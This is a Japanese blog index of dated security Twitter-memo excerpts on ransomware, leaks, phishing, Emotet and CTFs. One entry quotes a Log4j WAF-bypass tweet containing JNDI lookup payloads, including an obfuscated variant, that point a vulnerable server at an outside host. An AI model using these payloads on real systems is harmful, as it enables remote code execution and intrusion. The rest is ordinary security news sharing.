セキュリティ関連メモ

2022/7/31 セキュリティ関連Twitterメモ

DNS over TLS (DoT) が Windows Insiders にきたぞー https://t.co/Tt88lV9iAV — Yurika (@EurekaBerry) Jul 13, 2022 海外でもこういう認識というか発想はあるんだね(笑) "ペン"テスター https://t.co/ZBgMlhrkcI — keeg_gk_hoge_foo_brabra (@GkKeeg) Jul …

2022/7/14 セキュリティ関連Twitterメモ

ランサムウェアLockBit3.0のアフィリエイト(実際に攻撃して対価を受け取る)になる条件、結構ハードル高い https://t.co/8NHWdyNqPP — 三輪信雄 (@NobMiwa) Jul 4, 2022 一般ユーザに払い出すと危険なサブドメインやメールアドレス - ASnoKaze blog https:/…

2022/7/4 セキュリティ関連Twitterメモ

尼崎市の全市民情報入りUSBを発見 https://t.co/3qUpEGejvO 見つかったんだねー — にゃん☆たく (@taku888infinity) Jun 24, 2022 継続中です。 CISA: Log4Shell exploits still being used to hack VMware servers https://t.co/DbaOO7GCTP — 辻 伸弘 (no…

2022/6/24 セキュリティ関連Twitterメモ

CISA Alert (AA22-158A) 中華人民共和国に支援されたサイバー犯罪者がネットワークプロバイダーやデバイスを悪用している (2022.06.07): まるちゃんの情報セキュリティ気まぐれ日記 https://t.co/JsM147cmfi — piyokango (@piyokango) Jun 12, 2022 業務委託…

2022/6/12 セキュリティ関連Twitterメモ

SECCON Beginners CTF 2022お疲れさまでした 以下作問者Writeupです #ctf4b https://t.co/PvoCkHngyz — うしがぃ (@ushigai_sub) Jun 5, 2022 ご参加いただきありがとうございました! Web問題の作問者writeupです。 SECCON Beginners CTF 2022 作問者writeu…

2022/6/4 セキュリティ関連Twitterメモ

2nd "Offensive Cyber Operations" (hardback out in Europe!) tidbit - We often view offensive cyber as the child of SIGINT agencies, but we can learn so much about military cyber by looking at what it inherited from both SIGINT and Electroni…

2022/5/29 セキュリティ関連Twitterメモ

ホワイト偽装、「プロ」大量採用: 日本経済新聞 https://t.co/YSKHDqjYEI — piyokango (@piyokango) May 16, 2022 HUI Loaderの分析 - JPCERT/CC Eyes https://t.co/b9r226oVOY — piyokango (@piyokango) May 16, 2022 DNSリバインディング(DNS Rebinding)対…

2022/5/15 セキュリティ関連Twitterメモ

Heroku、全ユーザーのパスワードをリセット - OAuthトークンの漏洩受け | TECH+ https://t.co/R47Qdnrbhp — 辻 伸弘 (nobuhiro tsuji) (@ntsuji) May 6, 2022 @0zte9 『ホワイトハッカーの教科書』の感想ツイートありがとうございます???♀? 本書をきっかけと…

2022/5/7 セキュリティ関連Twitterメモ

.lnk型のEmotetのタイムスタンプの箇所についてちょっと遊んでみてたのだけど、通常の右クリックでの作成だとpowershell.exeのタイムスタンプやファイルサイズを持ってくるのだけど(右)、ばら撒かれているやつは情報持ってなさそう(左)なので別途ツール…

2022/4/29 セキュリティ関連Twitterメモ

FortinetのVPN、リストが漏洩したのは去年の11月頃だったでしょうか。一時期リスト中の日本のIPを調べていたのですが、IPの管轄(登録)がISPに帰結するものがほとんどでした。その中に半田病院が混じっていたのかも知れないなと、今になって思います。 http…

2022/4/24 セキュリティ関連Twitterメモ

こわっ・・・ と思う一方、資料がわかりやすく、ユニークに作ってあることに目が行きますねw 本当にあった怖い脆弱性の話 https://t.co/59UZoxbuQw — モグ|セキュリティゼネラリスト (@moneymog) Apr 12, 2022 羽田空港の“顔パス搭乗システム”で情報持ち出…

2022/4/12 セキュリティ関連Twitterメモ

2022年3月の #ランサム リーク確認数 ()は前月数 1??? #Lockbit2 102(78) 2??? #CONTI 65(34) 3??? #BlackCat 20(21) 3??? #Hive 20(9) 5??? #Pandora 4(1) 6??? #Snatch 3(5) 6??? #RansomExx 3(1) 8??? #Ragnar 2(0) 9??? #CL0P 1(11) ???? #Grief 0(0) To…

2022/4/4 セキュリティ関連Twitterメモ

当社が管理するメール中継システムによる外部メール不正中継について | SBテクノロジー (SBT) https://t.co/1NvGf3ElHK — 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Mar 21, 2022 自動車自動運転システムを開発している米国企業を攻撃したと主張しているランサム…

2022/3/22 セキュリティ関連Twitterメモ

とある通販サイトを使ったのだけど、『メールアドレス・パスワードを保存する』というチェックボックスがあったので嫌な予感がした。案の定、ログイン画面でメールアドレスとパスワードがフィルされる。特定のクッキーによって、サーバー側でパスワードがHTM…

2022/3/13 セキュリティ関連Twitterメモ

NVIDIA社員のパスワード数千件がネットに流出、ハッカー集団から奇妙な要求 | TechCrunch Japan https://t.co/AYo5jP70xa — 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Mar 6, 2022 えきねっとのフィッシングサイトを確認しました。ご注意を。 ▼ドメイン ekunta[.]…

2022/3/5 セキュリティ関連Twitterメモ

トレーニングプラットフォーム「BLUE TEAM LABS ONLINE」のご紹介: NECセキュリティブログ | NEC https://t.co/IDTY9cYf3F ログ分析やフォレンジックをゲーム形式で学んでみたい人にとっては良さそう — ほよたか (@takahoyo) Feb 20, 2022 Blinding EDR On W…

2022/2/20 セキュリティ関連Twitterメモ

今週の最初の #Emotet のVT上での結果。 1日経って検出は4割強→7割強。 検出が増える間にメールの情報は盗られてる。 このhashは約10分程度のみの出現で、その先はまた別のhash。 だからEmoCheckのような特化ツールが必要。 サンプルは以下。 https://t.co/F…

2022/2/8 セキュリティ関連Twitterメモ

ルートはメルカリでしたか。しかし、購入した「中古HD」のデータを復元してしまう”善意の”匿名通報者は、どういった方なのかも気になる所です。 「元従業員の売却HDD内に業務文書、データ複製の連鎖で - ラック」 https://t.co/NYBjMVlRgm — キタきつね (@fo…

2022/1/18 セキュリティ関連Twitterメモ

Today, we're open sourcing a log4j JAR scanner. Throw it at a filesystem, detect vulnerable JARs, and even rewrite them in place. Includes a Go API to import the JAR parsing for other applications. https://t.co/TWC4SJFm3p — Eric Chiang (@e…

2021/12/30 セキュリティ関連Twitterメモ

Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF : https://t.co/f3Fi7E34TY — H4x0r-DZ (@h4x0r_dz) Dec 11, 2021 Apache Log4j2 2.14.1 RCE (CVE-2021-44228) ??Bypass…

2021/12/12 セキュリティ関連Twitterメモ

I've just published "MAS" Article 1 -- version 1.1. As I'd simplified the original script on page 30, I left (by mistake) two dead lines there (now both removed) The new version (A.1) of the PDF (and next updates) will be published here: h…

2021/12/5 セキュリティ関連Twitterメモ

はてなブログに投稿しました #はてなブログ #FoxonSecurity #セキュリティ 日本人パスワードは「数字」「キーボード配列」「日本人名」に加えて「繰り返し語」 - Fox on Security https://t.co/4SXHOo2HDK — キタきつね (@foxbook) Nov 23, 2021 メールで #P…

2021/11/23 セキュリティ関連Twitterメモ

プリンターが止まらない 戦慄のランサムウエア 被害企業が語った|サイカルジャーナル|NHK NEWS WEB https://t.co/cIzvxfwdXl — piyokango (@piyokango) Nov 9, 2021 セキュリティハイプサイクル(日本語)が出てます。(カタカナ率高いのがアレですが・・…

2021/11/9 セキュリティ関連Twitterメモ

WordPress のセキュリティ対策についてしゃべりました! https://t.co/lEx7FKK4TE #wpmeetupkyoto — ym (@ym405nm) Nov 1, 2021 KDDIセキュリティ(au)を騙り偽apkをダウンロードさせる手口のフィッシングメール(SMS)を観測しました。 hivhtwyfaa[.]duckd…

2021/11/1 セキュリティ関連Twitterメモ

面白い基調講演だった。色んな人に伝えていくことも我々の責務ですね #DevelopersIO [レポート]基調講演1:「サイバーセキュリティの万華鏡を揺らす ? 人間行動とサイバーセキュリティへの没入型調査」 ? CODE BLUE 2021 #codeblue_jp https://t.co/XaUdEm9d…

2021/10/18 セキュリティ関連Twitterメモ

弊社、実はひっそりとエンジニアブログを始めてました! 導入編では、サイバー脅威インテリジェンスとは何か?からどんな環境を準備すればいいのかを紹介してます。 今日からできるサイバー脅威インテリジェンスの話-導入編- - NFLabs. エンジニアブログ htt…

2021/10/3 セキュリティ関連Twitterメモ

Meris botnet について、MikroTik のコメント。新しい脆弱性があるというわけではないらしい。2018年の Chimay Red 脆弱性 (Hajime が悪用してたやつ) のパッチ適用前にパスワードぬかれてて、変更してないんじゃないかとのこと。 M?ris botnet information …

2021/9/15 セキュリティ関連Twitterメモ

https://t.co/6obTV4sFXR — Neutral8?9eR (@0x009AD6_810) Aug 24, 2021 IIJ のハニーポットでも Realtek SDK の管理インタフェースの脆弱性を狙う攻撃を 8/22 から観測しています。複数の攻撃者による Mirai 亜種の感染試行で、formWsc と formSysCmd への…

2021/8/23 セキュリティ関連Twitterメモ

東京オリンピックのサイバー関連の出来事についてまとめてみた - piyolog https://t.co/iS3RYvNlXE — にゃん☆たく (@taku888infinity) Aug 9, 2021 企業がランサムウェア攻撃を受けた時にすべきこと | TECH+ https://t.co/qYWlVeoI5Q — にゃん☆たく (@taku88…

2021/8/8 セキュリティ関連Twitterメモ

サイバー攻撃対策ツール23選比較!選び方や導入時の注意点も解説 | マイナビニュース https://t.co/cffXxaE4t5 #にゃんたくメモ — にゃん☆たく (@taku888infinity) Aug 2, 2021 CORSがなぜこうなっているのかの推測。私の動画も見ていただければ。この記事に…